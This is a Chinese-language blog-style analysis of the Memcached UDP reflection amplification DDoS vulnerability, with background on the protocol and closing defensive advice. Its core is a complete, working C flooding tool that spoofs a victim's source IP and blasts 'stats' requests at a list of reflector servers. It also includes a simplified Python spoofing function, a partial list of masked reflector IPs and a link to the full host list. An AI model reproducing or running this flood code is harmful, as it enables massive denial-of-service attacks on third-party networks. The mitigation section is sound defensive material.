1、前言
2月28日,Memcache服務器被曝出存在UDP反射放大攻擊漏洞。攻擊者可利用這個漏洞來發起大規模的DDoS攻擊,從而影響網絡正常運行。漏洞的形成原因為Memcache 服務器UDP 協議支持的方式不安全、默認配置中將 UDP 端口暴露給外部鏈接。
2、原理分析
這個漏洞的攻擊方式屬於DRDOS(Distributed Reflection Denial of Service)分布式反射拒絕服務攻擊。
- DRDOS
對於分布式還有拒絕服務都很好理解,反射的意思簡單來說就是借別人的手來攻擊。Memcache滿足被借用的條件就可以借用Memcache的手來攻擊其他主機。
- Memcached攻擊原理
攻擊者向端口11211 上的 Memcache 服務器發送小字節請求。由於 UDP 協議並未正確執行,因此 Memcache 服務器並未以類似或更小的包予以響應,而是以有時候比原始請求大數千倍的包予以響應。由於 UDP 協議即包的原始 IP 地址能輕易遭欺騙,也就是說攻擊者能誘騙 Memcache 服務器將過大規模的響應包發送給另外一個 IP 地址即 DDoS 攻擊的受害者的 IP 地址。這種類型的 DDoS 攻擊被稱為“反射型 DDoS”或“反射 DDoS”。響應數據包被放大的倍數被稱為 DDoS 攻擊的“放大系數”。
3、影響范圍
- Shadon
shadon搜索可得到約 65890個結果。
- ZoomEye
ZoomEye找到約 205,972 條結果
4、基礎知識
所有放大攻擊背后的想法都是一樣的。攻擊者使用源IP欺騙的方法向有漏洞的UDP服務器發送偽造請求。UDP服務器,不知道請求是偽造的,禮貌地准備響應。當成千上萬的響應被傳遞給一個不知情的目標主機時,這個攻擊問題就會發生。那么我們就需要了解兩件事,一是Memcached如何對數據的存取,二是如何偽造IP。
翻閱互聯網文章發現一條使用NC測試自身是否存在漏洞的命令。-q1是1秒后退出,-u是指定UDP協議發送
echo -en "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n" | nc -q1 -u 127.0.0.1 11211
根據以上兩點線索為引子搜索資料。
Memcached
網上的POC大多數都是用了Memcached緩存系統的幾個關鍵命令stats、set、get 命令。查閱這幾個命令的詳細功能參數如下:
set 命令
Memcached set 命令用於將 value(數據值) 存儲在指定的 key(鍵) 中。
如果set的key已經存在,該命令可以更新該key原來所對應的數據,實現更新的作用。
語法:
set 命令的基本語法格式如下:
set key flags exptime bytes [noreply]
value
參數說明如下:
- key:鍵值 key-value 結構中的 key,用於查找緩存值。
- flags:可以包括鍵值對的整型參數,客戶機使用它存儲關於鍵值對的額外信息 。
- exptime:在緩存中保存鍵值對的時間長度(以秒為單位,0 表示永遠)
- bytes:在緩存中存儲的字節數
- noreply(可選): 該參數告知服務器不需要返回數據
- value:存儲的值(始終位於第二行)(可直接理解為key-value結構中的value)
實例
以下實例中我們設置:
- key → runoob
- flag → 0
- exptime → 900 (以秒為單位)
- bytes → 9 (數據存儲的字節數)
- value → memcached
set runoob 0 900 9 # 輸入的命令
memcached # 存儲的字符
STORED # 返回的結果
get runoob # 取出數據
VALUE runoob 0 9
memcached
END
輸出
如果數據設置成功,則輸出:
STORED
輸出信息說明:
- STORED:保存成功后輸出。
- ERROR:在保存失敗后輸出。
get 命令
Memcached get 命令獲取存儲在 key(鍵) 中的 value(數據值) ,如果 key 不存在,則返回空。
語法:
get 命令的基本語法格式如下:
get key
多個 key 使用空格隔開,如下:
get key1 key2 key3
參數說明如下:
- key:鍵值 key-value 結構中的 key,用於查找緩存值。
實例
在以下實例中,我們使用 runoob 作為 key,過期時間設置為 900 秒。
set runoob 0 900 9
memcached
STORED
get runoob
VALUE runoob 0 9
memcached
END
Python-網絡協議庫Scapy模塊
python中有個模塊scapy,可以偽造源IP
from scapy.all import *
send(IP(src='10.0.10.10',dst="www.baidu.com")/TCP(dport=80))
tcpdump抓包:sudo tcpdump host 115.239.210.27 會發現源IP有所改變。
5、代碼編寫技巧
Python版本POC(簡化)
就不發出所有利用函數了。
def attack(vuln_host,drdos_host,port):
send_data="get ab\r\n"
#下面這句話的意思是偽造受害者向存在memcached漏洞的服務器發起UDP請求,源端口是29284,目標端口是port
packet=scapy.all.IP(dst=vuln_host,src=drdos_host) / scapy.all.UDP(sport=29284,dport=port) / send_data
send(packet,inter=1,count=1)
C語言版本POC
/**
memcached-PoC
memcached Proof of Concept Amplification via spoofed source UDP packets. Repo includes source code for PoC and approximately 17,000 AMP hosts.
memcached.c - Source code (https://pastebin.com/raw/ZiUeinae)
memecache-amp-03-05-2018-rd.list - List of memcached servers as of 03-05-2018 (https://pastebin.com/raw/eSCHTTVu)
Compile: gcc memcached.c -o memecached -pthread
*Educational and/or testing purposes only. *Use of these tools against an unauthorized party may be unethtical, rude, and even illegal in some countries.
**/
/*
memcache reflection script
greeting: syn, storm, krashed, chrono, spike, niko, disliked
Use with extreme Caution
*/
#include <time.h>
#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#define MAX_PACKET_SIZE 8192
#define PHI 0x9e3779b9
static uint32_t Q[4096], c = 362436;
struct list
{
struct sockaddr_in data;
struct list *next;
struct list *prev;
};
struct list *head;
volatile int tehport;
volatile int limiter;
volatile unsigned int pps;
volatile unsigned int sleeptime = 100;
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
void init_rand(uint32_t x)
{
int i;
Q[0] = x;
Q[1] = x + PHI;
Q[2] = x + PHI + PHI;
for (i = 3; i < 4096; i++)
{
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
}
}
uint32_t rand_cmwc(void)
{
uint64_t t, a = 18782LL;
static uint32_t i = 4095;
uint32_t x, r = 0xfffffffe;
i = (i + 1) & 4095;
t = a * Q[i] + c;
c = (t >> 32);
x = t + c;
if (x < c) {
x++;
c++;
}
return (Q[i] = r - x);
}
unsigned short csum (unsigned short *buf, int nwords)
{
unsigned long sum = 0;
for (sum = 0; nwords > 0; nwords--)
sum += *buf++;
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return (unsigned short)(~sum);
}
void setup_ip_header(struct iphdr *iph)
{
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 15;
iph->id = htonl(54321);
iph->frag_off = 0;
iph->ttl = MAXTTL;
iph->protocol = IPPROTO_UDP;
iph->check = 0;
iph->saddr = inet_addr("192.168.3.100");
}
void setup_udp_header(struct udphdr *udph)
{
udph->source = htons(5678);
udph->dest = htons(11211);
udph->check = 0;
memcpy((void *)udph + sizeof(struct udphdr), "\x00\x01\x00\x00\x00\x01\x00\x00stats\r\n", 15); // 使用 stats 命令來輸出 Memcached 服務信息
udph->len=htons(sizeof(struct udphdr) + 15);
}
// 主要攻擊函數-線程回調函數
void *flood(void *par1)
{
struct thread_data *td = (struct thread_data *)par1;
char datagram[MAX_PACKET_SIZE];
struct iphdr *iph = (struct iphdr *)datagram;
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
struct sockaddr_in sin = td->sin;
struct list *list_node = td->list_node;
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
if(s < 0){
fprintf(stderr, "Could not open raw socket.\n");
exit(-1);
}
init_rand(time(NULL));
memset(datagram, 0, MAX_PACKET_SIZE);
setup_ip_header(iph);
setup_udp_header(udph);
udph->source = htons(rand() % 65535 - 1026);
iph->saddr = sin.sin_addr.s_addr;
iph->daddr = list_node->data.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
int tmp = 1;
const int *val = &tmp;
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
exit(-1);
}
init_rand(time(NULL));
register unsigned int i;
i = 0;
while(1){
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data)); //UDP發送數據
list_node = list_node->next;
iph->daddr = list_node->data.sin_addr.s_addr;
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
pps++;
if(i >= limiter)
{
i = 0;
usleep(sleeptime);
}
i++;
}
}
int main(int argc, char *argv[ ])
{
// 參數小於6,添加說明
if(argc < 6){
fprintf(stderr, "Invalid parameters!\n");
fprintf(stdout, "Usage: %s <target IP> <port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);
exit(-1);
}
srand(time(NULL)); //生成隨機數種子
int i = 0;
head = NULL;
fprintf(stdout, "Setting up sockets...\n");
int max_len = 128;
char *buffer = (char *) malloc(max_len);
buffer = memset(buffer, 0x00, max_len);
int num_threads = atoi(argv[4]); // 線程數
int maxpps = atoi(argv[5]); // 開啟PPS 速率
limiter = 0;
pps = 0;
int multiplier = 20;
FILE *list_fd = fopen(argv[3], "r"); // 讀取文件中的IP地址
while (fgets(buffer, max_len, list_fd) != NULL) {
if ((buffer[strlen(buffer) - 1] == '\n') ||
(buffer[strlen(buffer) - 1] == '\r')) {
buffer[strlen(buffer) - 1] = 0x00;
if(head == NULL)
{
head = (struct list *)malloc(sizeof(struct list));
bzero(&head->data, sizeof(head->data));
head->data.sin_addr.s_addr=inet_addr(buffer); // 漏洞IP地址填寫
head->next = head;
head->prev = head;
} else {
struct list *new_node = (struct list *)malloc(sizeof(struct list));
memset(new_node, 0x00, sizeof(struct list));
new_node->data.sin_addr.s_addr=inet_addr(buffer);
new_node->prev = head;
new_node->next = head->next;
head->next = new_node;
}
i++;
} else {
continue;
}
}
struct list *current = head->next;
pthread_t thread[num_threads];
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr(argv[1]); //受攻擊主機填寫
struct thread_data td[num_threads];
for(i = 0;i<num_threads;i++){
td[i].thread_id = i;
td[i].sin= sin;
td[i].list_node = current; //存儲漏洞IP
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
}
fprintf(stdout, "Starting flood...\n");
for(i = 0;i<(atoi(argv[6])*multiplier);i++) // 時間控制
{
usleep((1000/multiplier)*1000);
if((pps*multiplier) > maxpps)
{
if(1 > limiter)
{
sleeptime+=100;
} else {
limiter--;
}
} else {
limiter++;
if(sleeptime > 25)
{
sleeptime-=25;
} else {
sleeptime = 0;
}
}
pps = 0;
}
return 0;
}
// memcached AMP list (Approx 17,000 hosts) DATE: 03-06-2018 - Remove this top line for use with most testing tools.
85.62.36.xx
112.78.10.xx
202.105.247.xx
121.40.71.xx
101.201.199.xx
129.144.63.xx
61.141.124.xx
103.100.209.xx
113.96.195.xx
47.90.76.xx
83.164.193.xx
74.122.193.xx
120.76.207.xx
120.24.69.xx
129.144.61.xx
105.212.115.xx
130.226.11.xx
179.108.253.xx
203.11.105.xx
6、防御策略
- 1 設置訪問控制規則
例如,在Linux環境中運行命令iptables -A INPUT -p tcp -s 192.168.0.2 —dport 11211 -j ACCEPT,在iptables中添加此規則只允許192.168.0.2這個IP對11211端口進行訪問。
- 2 綁定監聽IP
如果Memcached沒有在公網開放的必要,可在Memcached啟動時指定綁定的IP地址為 127.0.0.1。例如,在Linux環境中運行以下命令:
memcached -d -m 1024 -u memcached -l 127.0.0.1 -p 11211 -c 1024 -P /tmp/memcached.pid
- 3 使用最小化權限賬號運行Memcached服務
使用普通權限賬號運行,指定Memcached用戶。例如,在Linux環境中運行以下命令來運行Memcached:
memcached -d -m 1024 -u memcached -l 127.0.0.1 -p 11211 -c 1024 -P /tmp/memcached.pid
- 4 啟用認證功能
Memcached本身沒有做驗證訪問模塊,Memcached從1.4.3版本開始,能支持SASL認證。SASL認證詳細配置手冊
- 5 修改默認端口
修改默認11211監聽端口為11222端口。在Linux環境中運行以下命令:
memcached -d -m 1024 -u memcached -l 127.0.0.1 -p 11222 -c 1024 -P /tmp/memcached.pid
7、參考
【Memcached Servers Can Be Abused for Insanely Massive DDoS Attacks】
https://www.bleepingcomputer.com/news/security/memcache-servers-can-be-abused-for-insanely-massive-ddos-attacks/
【Memcache服務器可用於發動超大規模的DDoS攻擊,影響嚴重】
https://www.anquanke.com/post/id/99241
【Memcrashed - Major amplification attacks from UDP port 11211】
https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
【Memcached之反射拒絕服務攻擊技術原理】
http://blog.topsec.com.cn/ad_lab/memcached之反射拒絕服務攻擊技術原理/?from=timeline
【Memcached-PoC memcache reflection script】
https://pastebin.com/raw/ZiUeinae
【Memcached set 命令】
http://www.runoob.com/memcached/memcached-set-data.html
【How to send only one UDP packet with netcat】
https://stackoverflow.com/questions/9696129/how-to-send-only-one-udp-packet-with-netcat